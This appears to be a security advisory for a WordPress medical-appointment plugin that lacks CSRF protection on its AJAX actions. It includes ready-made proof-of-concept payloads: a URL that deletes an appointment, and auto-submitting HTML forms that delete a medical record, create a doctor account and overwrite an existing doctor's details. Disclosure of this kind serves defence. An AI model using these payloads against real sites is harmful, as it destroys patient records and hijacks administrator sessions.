The plugin does not have CSRF checks (either flawed or missing completely) in various AJAX actions, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks. This includes, but is not limited to: Delete arbitrary appointments/medical records/etc, create/update various users (patients, doctors etc)
Make a logged in admin open the following URL to make them delete the appointment with ID 1: https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=appointment_delete&id=1
Make a logged in admin open a page with the HTML code below
To make them delete the medial record with ID 1:
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
<input type="text" name="route_name" value="medical_records_delete"/>
<input type="text" name="id" value="1">
<input type="submit" value="submit">
</form>
</body>
To make them create a new doctor:
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
<input type="text" name="user_email" value="[email protected]">
<input type="text" name="first_name" value="Attacker">
<input type="text" name="last_name" value="Via CSRF">
<input type="text" name="mobile_number" value="1">
<input type="text" name="gender" value="other">
<input type="submit" value="submit">
</form>
</body>
To edit an existing doctor, add the ID and the correct email to the code above, e.g
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
<input type="text" name="ID" value="8">
<input type="text" name="user_email" value="[email protected]">
<input type="text" name="first_name" value="Attacker">
<input type="text" name="last_name" value="Via CSRF">
<input type="text" name="mobile_number" value="1">
<input type="text" name="gender" value="other">
<input type="submit" value="submit">
</form>
</body>
(This will change their name, mobile number and gender as well as reset their specialisation etc)